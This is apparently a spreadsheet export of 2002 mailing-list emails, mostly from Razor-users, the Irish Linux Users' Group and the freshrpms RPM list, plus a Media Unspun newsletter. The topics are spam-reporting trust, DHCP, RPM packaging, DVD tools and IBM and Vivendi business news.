it's spam?\n\nYou always have that ability.\n\n&gt; Correct me if I'm wrong, but it's not as if all mail from ZDNet will be\n&gt; banned in the future-just that one piece.  So if ZDNet were to change\n&gt; its system to make it easier to opt out, or whatever, people would hopefully\n&gt;  start unsubscribing instead of clicking the "Spam" button.\n\nIt's my opinion that it's not my job to unsubscribe to any list that I\nhaven't subscribed to, nor is it necessarily in my best interest given\nthat some parties sending unwanted communications may utilize the\nunsubscribe request as a method of determining they are mailing a valid\naddress.\n\n&gt; The inherent problem here, of course, is that someone can pretend to be\n&gt; 1,000 people and block anything they choose.  But say you still have a\n&gt; lightweight trust system built in, where when they "agree" with the\n&gt; majority (though they couldn't have known because razor hadn't\n&gt; acknowledged anything yet) then your trust rating goes up and vice\n&gt; versa.\n&gt;\n&gt; The key here is that, in order to be reliable, you need the numbers.  What\n&gt; am I missing here?\n\nSee above.\n\n\n/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\n                               Patrick Greenwell\n         Asking the wrong questions is the leading cause of wrong answers\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\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Oates, Isaac" &lt;ioates@amazon.com&gt;\nFrom: Patrick &lt;patrick@stealthgeeks.net&gt;\nDate: Wed, 14 Aug 2002 14:12:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 14:12:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: [Razor-users] many vs one</t>
  </si>
  <si>
    <t>On Wed, 14 Aug 2002, Oates, Isaac wrote:\n\n&gt; I'm new to razor but have studied trust systems before.  I've been following\n&gt; the threads about TeS and have a few thoughts.\n&gt;\n&gt; First, a more complex algorithm is not always better.  As soon as you start\n&gt; accounting for edge cases in what should otherwise be a generalized\n&gt; algorithm, general performance begins to degrade exponentially.  The\n&gt; thing that razor should have going for it is numbers.  Say that razor\n&gt; has 100,000 people that actively use it (i.e. click the "Spam" button on\n&gt; their mail reader from time to time.)  If we decide that our objective\n&gt; is to screen 99.0% of spam, it means that we can continue to show what\n&gt; appears to be a piece of spam to 1,000 people and still meet our\n&gt; objective.\n&gt;\n&gt; Why not just wait for 1,000 people to vote that a piece of mail is indeed\n&gt; spam before ever acknowledging that it could potentially be spam?  In\n&gt; other words, when I razor-report a message, should I be able to tell\n&gt; that razor has ever even seen that message?\n\nBecause you then have a system that is ineffective to a varying degree. A\nsimplistic view would be that 999 subscribers received a piece of spam\nthat could have otherwise been avoided. But the reality is likely that\nmany, many more individuals would have received the piece of spam when you\nfactor in report times.\n\n&gt; By having the server pretend to never have seen it, you can avoid\n&gt; people who just re-report spam because it was already marked as spam,\n&gt; something that is completely useless.\n\nWrong. razor-check will tell you if a specific piece of mail matches\nsomething already in the database. If you have the system pretend to have\nnever seen a piece of mail, how do you propose people use the system for\nfiltering?\n\n&gt; What about revocations?  A revocation is after the fact because a\n&gt;  substantial number of people (1,000, in this example) have already\n&gt; decided that they do not want that message.  If it is marked as spam by\n&gt; all those people, and then people start revoking it, what does that\n&gt; mean?\n\n&gt; It means that the revokers have an opinion that probably doesn't mesh\n&gt; with the majority;\n\nNo, it means that the people doing the revoking have a different opinion\nthan the 1000 people who have submitted it as spam. Rather the 1000 people\nwho have reported the message as spam constitute a majority or not is\nsomething that would have to be determined in the context of the\nindividual message.\n\n&gt; instead of messing with its rating, why not just put\n&gt; it on the whitelist?  If I want that ZDNet mail, and most people think\n&gt; that ZDNet mail is just plain annoying, then why can't I whitelist it,\n&gt; instead of "arguing" with everyone about whether or not it's spam?\n\nYou always have that ability.\n\n&gt; Correct me if I'm wrong, but it's not as if all mail from ZDNet will be\n&gt; banned in the future-just that one piece.  So if ZDNet were to change\n&gt; its system to make it easier to opt out, or whatever, people would hopefully\n&gt;  start unsubscribing instead of clicking the "Spam" button.\n\nIt's my opinion that it's not my job to unsubscribe to any list that I\nhaven't subscribed to, nor is it necessarily in my best interest given\nthat some parties sending unwanted communications may utilize the\nunsubscribe request as a method of determining they are mailing a valid\naddress.\n\n&gt; The inherent problem here, of course, is that someone can pretend to be\n&gt; 1,000 people and block anything they choose.  But say you still have a\n&gt; lightweight trust system built in, where when they "agree" with the\n&gt; majority (though they couldn't have known because razor hadn't\n&gt; acknowledged anything yet) then your trust rating goes up and vice\n&gt; versa.\n&gt;\n&gt; The key here is that, in order to be reliable, you need the numbers.  What\n&gt; am I missing here?\n\nSee above.\n\n\n/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\n                               Patrick Greenwell\n         Asking the wrong questions is the leading cause of wrong answers\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\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Ronan Cunniffe &lt;ronan@cunniffe.net&gt;\nFrom: "Paul O Neil" &lt;poneil@dbiassociates.net&gt;\nDate: Wed, 14 Aug 2002 12:56:09 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 12:56:09 -0700</t>
  </si>
  <si>
    <t>"Paul O Neil" &lt;poneil@dbiassociates.net&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] DHCP</t>
  </si>
  <si>
    <t>&gt; Quoting Paul O'Neil : &gt;  &gt; &gt; Excuse me for asking an old question here but Ive been running SuSE  with a &gt; &gt; cable modem for a couple months. About 5-6 weeks ago the internet  access &gt; &gt; was &gt; &gt; not working and I rebooted noticing I came up with a new IP  address, and it &gt; &gt; worked fine. How does it work exactly when the cable company  releases and &gt; &gt; renews an ip address. Do they merely setup their system to issue  new ip &gt; &gt; addresses when cusomters reboot their computer or does it take  affect &gt; &gt; immediately and it caused the internet disruption that required a  reboot or &gt; &gt; at least a network reload? If so, can this be detected  automatically and &gt; &gt; taken care of or is that just how it works? &gt;  &gt; A DHCP client daemon (dhcpcd, pump) can do this automatically.  Some  cable &gt; companies apparently reassign the same address over and over when the  leases run &gt; out, so you get away without a daemon for long enough to make you  think you &gt; don't need one. :-) &gt;  &gt; Ronan &gt;  &gt;  Is what your talking about, this process is running all the time.  root       422  0.0  0.4  1332  500 ?        S    03:18    0:00 /sbin/dhcpcd -D -N -Y -t 999999 -h cable-modem-1 eth0 If alright then maybe coincidence, I'll wait and see when I get another  address. --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Alan Horkan &lt;horkana@tcd.ie&gt;\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Wed, 14 Aug 2002 12:02:13 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 12:02:13 -0700</t>
  </si>
  <si>
    <t>Alan Horkan &lt;horkana@tcd.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] Re: [ILUG] Linux: the film.</t>
  </si>
  <si>
    <t>[Moved from the ILUG list.  Not _entirely_ offlist as requested, but close enough.] Quoting Alan Horkan (horkana@tcd.ie): &gt; More likely we would try and get it when it comes out on video/dvd and &gt; show it then (which AFAIK is legal as we are non profit private &gt; organisation having a private showing and not charging our members for &gt; the showing. any opinions on the legality of this should be sent &gt; offlist). One bloke's opinion: Date: Sat, 01 Jun 2002 00:18:29 -0700 From: "J.T.S. Moore"  Reply-To: jtsmoore@pacificnet.net To: Marc MERLIN ,    Daniel Isacc Walker  CC: svlug@svlug.org, Rick Moen , sluglug@sluglug.ucsc.edu,    Peter Belew , "Eric A. Perlman" ,    i3e-off@cse.ucsc.edu, slug-web@sluglug.ucsc.edu Subject: REVOLUTION OS is now authorized for UC Santa Cruz screening To all, I have read the series of e-mails related to the unauthorized UC Santa Cruz screening that was scheduled for June 1.  I sincerely appreciate IEEE's good faith effort to correct the mistake. Consequently, so as not to inconvenience the people planning to attend the screening, I want to give IEEE and SlugLUG permission to screen REVOLUTION OS at 1 PM on June 1.  I would ask the members of SVLUG to hold off on attending the screening for the simple reason that I am trying to get REVOLUTION OS booked into the Camera 3 in San Jose, and I would prefer that SVLUG's members have a chance to see a nice 35mm print of the film.  If my distributor is unable to book the film into a theater in the Bay Area, I promise that I will work with SVLUG to quickly set up a screening for its members. I realize there may be some members of SlugLUG who are unhappy that I originally requested that they not hold an unauthorized screening of REVOLUTION OS.  There are several reasons why I made the request, and none of them have anything to do with me wanting to be a jerk.   One SlugLUG member commented that it was odd that a movie about the Open Source movement would not be available for open viewings.  Another SlugLUG member remarked that my request smacks of Bill Gates's Open Letter to Hobbyists.   The bottomline is that I did make a film about the Open Source movement, but to assume that automatically means that the film is itself Open Sourced seems to be a little bit of a stretch.  If I made a movie about the history of vegetarianism that would not automatically mean I'm a vegetarian.   I simply thought Open Source and Free Software were compelling subjects worth exploring and documenting.  As a result, I came to admire many aspects of the Open Source movement and chose to focus the documentary on the movement's positive history.  However, I do not think I should be punished for telling the story of Free Software and Open Source by having my intellectual property misappropriated.   More practically, my feelings about Open Sourcing REVOLUTION OS are abundantly clear when you see the explicit copyright notice at the end of the film's credits.   I realize that making a videotape copy for personal use from a TV airing is considered fair use.  I believe in a healthy fair use doctrine.  However, there is a big difference between viewing your personal copy at home with a few friends and holding a publicly advertised screening on a university campus.  So I freely admit my objection to unauthorized screenings of REVOLUTION OS does echo Bill Gates's letter.  Personally, I believe that the creator of a piece of intellectual property should retain the choice to Open Source their IP.  If the Open Source movement is not voluntary then it is really just piracy. One of the reasons I am concern with unauthorized group screenings of the film, is that my distributor is planning in a few weeks to begin selling VHS copies of the film for educational/institutional use with a license permitting noncommercial large group screenings.  We hope to use the money from these sales to fund the authoring and replication of the DVD.  I want to release the DVD as soon as possible, but I cannot afford to take on anymore REVOLUTION OS-related debt.  Thus the importance of preserving the educational/institutional market. Frequently, I will read comments on Slashdot and other mailing lists that justify the piracy of music on the grounds that it benefits the artists and only hurts the greedy record labels.  Well, in the case of REVOLUTION OS there is no multinational media conglomerate to punish.  It's just me.  I made and financed the film on my own.  I have worked full-time for almost three years without a salary.  The only way I will get out of debt and have a chance to make another film is if people seek out legal opportunities to view REVOLUTION OS. I truly appreciate the enthusiasm of the Open Source community for REVOLUTION OS, and I am grateful that people do want to see it.  If you will just bare with me, I will figure out a way for all interested persons to legally view it. I hope the dust up over the unauthorized, and now authorized, screening at UC Santa Cruz has not inconvenienced anyone. Sincerely, J.T.S. Moore Director, REVOLUTION OS --  Irish Linux Users' Group Social Events: social@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ssuciu@sitelite.com\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Wed, 14 Aug 2002 12:00:22 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 12:00:22 +0100</t>
  </si>
  <si>
    <t>ssuciu@sitelite.com</t>
  </si>
  <si>
    <t>RE: [ILUG] Server Partitioning</t>
  </si>
  <si>
    <t>Partitioning is an ambiguous term\nbut I think I know what you mean.\nHave you looked at: [URL]http://freevsd.org[/URL]\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://freevsd.org http://www.linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: =?iso-8859-1?q?Mich=E8l=20Alexandre=20Salim?= &lt;salimma1@yahoo.co.uk&gt;\nDate: Wed, 14 Aug 2002 11:42:15 +0100 (BST)</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 11:42:15 +0100 (BST)</t>
  </si>
  <si>
    <t>=?iso-8859-1?q?Mich=E8l=20Alexandre=20Salim?= &lt;salimma1@yahoo.co.uk&gt;</t>
  </si>
  <si>
    <t>Re: DVD+RW tools available (Was: Re: How to add service port ?)</t>
  </si>
  <si>
    <t>--- Matthias Saou  wrote: &gt; Once upon a time, Chris wrote : &gt;  &gt; &gt; To bring things back on topic, I was practicing my &gt; "rpmbuild'n skillz" &gt; &gt; and made an rpm with some simple software tools to &gt; drive my DVD+RW &gt; &gt; burner. No GUI frontend, but it works just fine &gt; from the command line. I &gt; &gt; even used it to burn a bootable DVD version of Red &gt; Hat 7.3. &gt; &gt;  &gt; &gt; &gt; ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm &gt;  &gt; Nice! :-) &gt; What about the "dvdrecord" package that's already &gt; included in 7.3? It &gt; doesn't do what this one does? I'm asking this &gt; because I've got a friend &gt; with an iMac running YellowDog Linux (basically Red &gt; Hat Linux for PPC), and &gt; it's one of the newer versions with a DVD burner. &gt; I'd be very interested in &gt; using his drive to burn DVDs full of 2-CDs movies or &gt; full of "files for &gt; xmame" ;-) &gt; Also, a bootable DVD of Red Hat Linux 7.3 would be &gt; great as I've still not &gt; burned the CDs even once for myself since I always &gt; install through the &gt; network (and haven't found an easy way of purchasing &gt; an english boxed set &gt; here in Spain...). &gt;  &gt; Matthias &gt;  That's done by bero - not too sure whether it works on DVD+RW drives, I believe it supports only DVD-R. Would be nice to have a unified tool for DVD/CD burning - already I do my CD burning from dvdrecord since it is more recent. Regards, Michel __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts [URL]http://uk.my.yahoo.com[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://uk.my.yahoo.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 14 Aug 2002 11:23:28 +0200</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 11:23:28 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Chris wrote : &gt; To bring things back on topic, I was practicing my "rpmbuild'n skillz" &gt; and made an rpm with some simple software tools to drive my DVD+RW &gt; burner. No GUI frontend, but it works just fine from the command line. I &gt; even used it to burn a bootable DVD version of Red Hat 7.3. &gt;  &gt; ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm Nice! :-) What about the "dvdrecord" package that's already included in 7.3? It doesn't do what this one does? I'm asking this because I've got a friend with an iMac running YellowDog Linux (basically Red Hat Linux for PPC), and it's one of the newer versions with a DVD burner. I'd be very interested in using his drive to burn DVDs full of 2-CDs movies or full of "files for xmame" ;-) Also, a bootable DVD of Red Hat Linux 7.3 would be great as I've still not burned the CDs even once for myself since I always install through the network (and haven't found an easy way of purchasing an english boxed set here in Spain...). Matthias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Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 14 Aug 2002 11:15:09 +0200</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 11:15:09 +0200</t>
  </si>
  <si>
    <t>Re: Problem with my spec file</t>
  </si>
  <si>
    <t>Once upon a time, Victor wrote : &gt; Can someone tell me what I am doing wrong? it's like make doesn't take &gt; the PREFIX override... It's crazy. I don't get it... &gt; OS: TurboLinux6 rmp3.0.6 make 3.79.1 &gt;  &gt; I just don't get this. It should work... &gt;  [...] &gt;  &gt; %build &gt;    %{__perl} Makefile.PL LOCAL_RULES_DIR=/etc/spamassassin &gt; INSTALLDIRS=vendor PREFIX=%{_prefix} &gt;    make OPTIMIZE="$RPM_OPT_FLAGS" PREFIX=%{_prefix} &gt; %install &gt;    rm -rf $RPM_BUILD_ROOT &gt;    %makeinstall PREFIX=%{buildroot}%{_prefix} \ &gt;                 INSTALLMAN1DIR=%{buildroot}%{_mandir}/man1 \ &gt;                 INSTALLMAN3DIR=%{buildroot}%{_mandir}/man3 \ &gt;                 LOCAL_RULES_DIR=%{buildroot}%{_sysconfdir}/spamassassin [...] Well, first you need to look at the Makefile.PL to see if it uses the PREFIX you're trying to pass to it or not. Maybe you'll need to "override" other paths when doing the "make". Second, the "%makeinstall" macro automatically overrides many common values like "prefix=" or "datadir=", so it's completely redundant with the "PREFIX=" you're passing to it. Take a look at the "Makefile" you have at that point to see how the "install" target is, and what it uses. Last, as Chris suggested, you can take a look at an existing package, like the one in Rawhide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Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 14 Aug 2002 11:02:03 +0200</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 11:02:03 +0200</t>
  </si>
  <si>
    <t>Re: xine problems</t>
  </si>
  <si>
    <t>Once upon a time, Nick wrote : &gt; 	I'm no longer able to play encrypted dvd's using the xine rpm from &gt; 	freshrpms.  &gt; I think it was about a week ago when I last rented some dvd's, worked &gt; just fine, but apparently since the latest xine update on freshrpms, it &gt; won't anymore.  &gt; The output is : &gt;  &gt; input_dvd: Sorry, this plugin doesn't play encrypted DVDs. The legal &gt; status &gt;            of CSS decryption is unclear and we can't provide such code. &gt;            Please check [URL]http://dvd.sf.net[/URL] for more information. &gt;  &gt; I'm pretty sure it worked with the previous freshrpms release... Any way &gt; of rolling back updates ? If you get this message, it means that you're using the "DVD" button, which is the default DVD plugin and doesn't support decryption. You should either use the "d4d" one (no menus) or "d5d" (with menus). Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://dvd.sf.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Wed, 14 Aug 2002 10:08:03 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 10:08:03 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] mirroring on a running system</t>
  </si>
  <si>
    <t>All right, can't get pissed though as its a week-day. If we were to do it in\nLucan, that would be another story ;--)\n\nDo we have many takers? \n\nCW\n\n-------------\nOn Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:\n&gt; When are we going to have a pint? \n\n Tuesday next week. Boars Head, Capel st.\n\nKate\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzz-unspun@example.com\nFrom: "Media Unspun" &lt;guterman@mediaunspun.imakenews.net&gt;\nDate: Wed, 14 Aug 2002 09:33:10 -0400</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 09:33:10 -0400</t>
  </si>
  <si>
    <t>"Media Unspun" &lt;guterman@mediaunspun.imakenews.net&gt;</t>
  </si>
  <si>
    <t>zzz-unspun@example.com</t>
  </si>
  <si>
    <t>SEC Exposes Big Blue's Pink Slips</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format... ------------=_1029331990-31627-4 Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit To view this newsletter in full-color, visit: [URL]http://newsletter.mediaunspun.com[/URL] M E D I A  U N S P U N What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] ----------------------------------------------------------------- August 14, 2002 ----------------------------------------------------------------- IN THIS ISSUE ----------------------------------------------------------------- * SEC EXPOSES BIG BLUE'S PINK SLIPS * SYNERGY AND BETRAYAL AT VIVENDI * OTHER STORIES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 ADVERTISEMENT ----------------------------------------------------------------- Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at: [URL]http://pcg.fisherinvestments.com[/URL] ----------------------------------------------------------------- SEC EXPOSES BIG BLUE'S PINK SLIPS ----------------------------------------------------------------- Does the Securities and Exchange Commission have a press pass yet? It seems to be bringing us all our news lately. On the day of the deadline for companies to certify their financial statements with the SEC, the business press squirmed and waited for the next Enron or WorldCom. (We might eat these words tomorrow, but we doubt it.) In an unrelated confession, IBM gave  the commission its latest layoff numbers. IBM talked about pink slips during its second-quarter earnings report, but with a vagueness worthy of your daily horoscope. ("Capricorn: Career changes may be on their way...") Only after "months of surreptitious layoff notices" did the company admit that it's cutting more than 15,600 jobs, said the AP. That's about 5% of its workforce, and a lot more than pundits expected.  An IBM spokesperson told the Wall Street Journal the higher number was due to "rebalancing" and more employees than expected  taking voluntary layoffs.  Sorry, we're still back on "rebalancing." Did IBM "rightsize" last quarter, too? IBM's news was still trickling out Wednesday morning, but some details were available. About 1,400 workers got cut from IBM's microelectronics unit, and most of the rest were from IT services and consulting. (That ought to make IBM's new employees  from PricewaterhouseCoopers feel all warm and fuzzy inside.) Look for news updates from cities that will see the cuts, such as Austin and Raleigh.  OK, none of this is good. Two years into the tech slump, we're still tired of seeing people get sacked. But was it really so bad that IBM only revealed it because of new accounting regulations? Nah, Big Blue was always known for "stealth layoffs," as CNN put it, but current corporate scrutiny forced it to 'fess up for once. Until now, IBM would acknowledge the latest layoffs if reporters called and asked, but wouldn't give specifics. Yeesh. - Jen Muehlbauer IBM Cut 5% of Staff in Period, Double the Expected Number [URL]http://online.wsj.com[/URL],,SB1029282408667791835,00.html (Paid subscription required.)  IBM to Cut Over 15,000 Employees (AP) [URL]http://tinyurl.com[/URL] IBM confirms 15,600 job cuts (Reuters) [URL]http://www.msnbc.com[/URL]  IBM cutting 15,000 jobs  [URL]http://news.com.com[/URL] IBM job cuts exceed 15,600 [URL]http://money.cnn.com[/URL] IBM puts job cuts at 15,600, with fewer than 50 in this state [URL]http://seattlepi.nwsource.com[/URL] ----------------------------------------------------------------- ADVERTISEMENT ----------------------------------------------------------------- You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? Download a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications. [URL]http://release1.edventure.com[/URL] ----------------------------------------------------------------- SYNERGY AND BETRAYAL AT VIVENDI ----------------------------------------------------------------- Synergy always was a fuzzy concept. Now Vivendi Universal's top man has slammed the lid on it. The French company announced today that it's ready to peddle $9.8 billion in assets to rustle  up some cash. First up on the block? Synergy-less U.S. book publisher Houghton Mifflin.  It's unclear whether new chairman Jean-Rene Fourtou has genuine turnaround muscle, or whether he and Vivendi's board are simply following the winds of post-merger fashion. But when you owe $18.7 billion, you get real practical, real fast. The Guardian reported that Vivendi's share price sank 5% on Tuesday when investors got the willies about the company's impending announcement on its financial health. But the company had positive news to report: It's making money. Revenue in the first  half was up 13%, higher than analysts' estimates of a 7.7% boost.  Details are scant on the breadth of Fourtou's restructuring efforts, with more information expected at the next board meeting on September 25, according to reporters. Houghton Mifflin, acquired a year ago for $1.7 billion, and a vague explanation that included the "Curious George" character, were the only properties named for sale so far. The Guardian speculated that Vivendi will also sell its U.S. video games business and possibly its stake in the French mobile phone company SFR, a debatable sale because of the cash it generates, according to the newspaper.  Meanwhile, Fourtou's predecessor, Jean-Marie Messier, continues to advocate empire-building. The New York Post said its sources say Messier hopes his former employer will feel generous enough to let him continue to reside in his $17 million Manhattan abode. And Bloomberg reported earlier this week that an unrepentant Messier is penning a memoir as he vacations in the Mediterranean. The working title? "How I Was Betrayed."  - Deborah Asbrand  Vivendi to Sell Publisher Houghton Mifflin (Reuters) [URL]http://www.washingtonpost.com[/URL] Vivendi investors expect the worst [URL]http://www.guardian.co.uk[/URL],3604,774190,00.html Vivendi to Sell $9.8 Billion In Assets, Including Houghton [URL]http://online.wsj.com[/URL],,SB102931297119161715,00.html (Paid subscription required.)  Ousted Messier Aims To Score $17m Vivendi Pad [URL]http://www.nypost.com[/URL] Ex-Chief of Vivendi Plans Tell-All Book (Bloomberg) [URL]http://www.nytimes.com[/URL] ----------------------------------------------------------------- OTHER STORIES ----------------------------------------------------------------- A Top AOL Manager Has Left Company [URL]http://www.nytimes.com[/URL] Fed Holds Steady on Interest Rates  [URL]http://www.washingtonpost.com[/URL] Amtrak halts all high-speed service after finding cracks [URL]http://www.sunspot.net[/URL] AOL lets resigning exec keep stock options  [URL]http://www.usatoday.com[/URL] Lucent licensing deal with Winstar focus of probe (AP) [URL]http://www.bayarea.com[/URL] Study Says Net Could Benefit Music Firms [URL]http://www.latimes.com[/URL] Eisner Crimping His Own Style [URL]http://www.latimes.com[/URL] Severance claims by Enron former execs anger ex-workers [URL]http://www.chron.com[/URL] Princeton removes dean after Yale Web site flap (AP) [URL]http://www.siliconvalley.com[/URL] Frisbee golf creator dies, may land on someone's roof (SF Chronicle) [URL]http://seattlepi.nwsource.com[/URL] Will Kinsley's Slate Get Wiped? [URL]http://www.ojr.org[/URL] Hollywood, Russian Bicker Over Bass [URL]http://www.cnn.com[/URL] ----------------------------------------------------------------- Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com  today. ----------------------------------------------------------------- STAFF ----------------------------------------------------------------- Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.com).  Marketing: Cowpoke Productions (cowpokeproductions.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________________ POWERED BY: [URL]http://www.imakenews.com[/URL] To be removed from this list, use this link: [URL]http://www.imakenews.com[/URL] To receive future messages in HTML format, use this link: [URL]http://www.imakenews.com[/URL] To change your subscriber information, use this link: [URL]http://www.imakenews.com[/URL] ------------=_1029331990-31627-4 Content-Type: text/html; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit       M E D I A  U N S P U N     Pass it on... 					 					What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] 					 					 				 				 					 					 						 							Wednesday, August 14, 2002 						 					 					 					 				   Top Spins... 			 						 				 			 			SEC Exposes Big Blue's Pink Slips 			 				 			 			 			 			 			 						 				 			 			Synergy and Betrayal at Vivendi 			 				 			 			 			 			   			 						 				 			 			Other Stories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Sponsor Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at: [URL]http://pcg.fisherinvestments.com[/URL]  			 			 			 			 			 			SEC Exposes Big Blue's Pink Slips 			 			 			 Does the Securities and Exchange Commission have a press pass yet? It seems to be bringing us all our news lately. On the day of the deadline for companies to certify their financial statements with the SEC, the business press squirmed and waited for the next Enron or WorldCom. (We might eat these words tomorrow, but we doubt it.) In an unrelated confession, IBM gave the commission its latest layoff numbers. IBM talked about pink slips during its second-quarter earnings report, but with a vagueness worthy of your daily horoscope. ("Capricorn: Career changes may be on their way...") Only after "months of surreptitious layoff notices" did the company admit that it's cutting more than 15,600 jobs, said the AP. That's about 5% of its workforce, and a lot more than pundits expected. An IBM spokesperson told the Wall Street Journal the higher number was due to "rebalancing" and more employees than expected taking voluntary layoffs.  Sorry, we're still back on "rebalancing." Did IBM "rightsize" last quarter, too? IBM's news was still trickling out Wednesday morning, but some details were available. About 1,400 workers got cut from IBM's microelectronics unit, and most of the rest were from IT services and consulting. (That ought to make IBM's new employees from PricewaterhouseCoopers feel all warm and fuzzy inside.) Look for news updates from cities that will see the cuts, such as Austin and Raleigh.  OK, none of this is good. Two years into the tech slump, we're still tired of seeing people get sacked. But was it really so bad that IBM only revealed it because of new accounting regulations? Nah, Big Blue was always known for "stealth layoffs," as CNN put it, but current corporate scrutiny forced it to 'fess up for once. Until now, IBM would acknowledge the latest layoffs if reporters called and asked, but wouldn't give specifics. Yeesh. - Jen Muehlbauer IBM Cut 5% of Staff in Period, Double the Expected Number [URL]http://online.wsj.com[/URL],,SB1029282408667791835,00.html  (Paid subscription required.)  IBM to Cut Over 15,000 Employees (AP) [URL]http://tinyurl.com[/URL]  IBM confirms 15,600 job cuts (Reuters) [URL]http://www.msnbc.com[/URL]  IBM cutting 15,000 jobs  [URL]http://news.com.com[/URL]  IBM job cuts exceed 15,600 [URL]http://money.cnn.com[/URL]  IBM puts job cuts at 15,600, with fewer than 50 in this state [URL]http://seattlepi.nwsource.com[/URL]  Sponsor 			  				 					 					You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? Download a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications. 					 					 			 			 			 			 			 			Synergy and Betrayal at Vivendi 			 			 			 Synergy always was a fuzzy concept. Now Vivendi Universal's top man has slammed the lid on it. The French company announced today that it's ready to peddle $9.8 billion in assets to rustle up some cash. First up on the block? Synergy-less U.S. book publisher Houghton Mifflin.  It's unclear whether new chairman Jean-Rene Fourtou has genuine turnaround muscle, or whether he and Vivendi's board are simply following the winds of post-merger fashion. But when you owe $18.7 billion, you get real practical, real fast. The Guardian reported that Vivendi's share price sank 5% on Tuesday when investors got the willies about the company's impending announcement on its financial health. But the company had positive news to report: It's making money. Revenue in the first half was  up 13%, higher than analysts' estimates of a 7.7% boost.  Details are scant on the breadth of Fourtou's restructuring efforts, with more information expected at the next board meeting on September 25, according to reporters. Houghton Mifflin, acquired a year ago for $1.7 billion, and a vague explanation that included the "Curious George" character, were the only properties named for sale so far. The Guardian speculated that Vivendi will also sell its U.S. video games business and possibly its stake in the French mobile phone company SFR, a debatable sale because of the cash it generates, according to the newspaper.  Meanwhile, Fourtou's predecessor, Jean-Marie Messier, continues to advocate empire-building. The New York Post said its sources say Messier hopes his former employer will feel generous enough to let him continue to reside in his $17 million Manhattan abode. And Bloomberg reported earlier this week that an unrepentant Messier is penning a memoir as he vacations in the Mediterranean. The working title? "How I Was Betrayed."  - Deborah Asbrand  Vivendi to Sell Publisher Houghton Mifflin (Reuters) [URL]http://www.washingtonpost.com[/URL]  Vivendi investors expect the worst 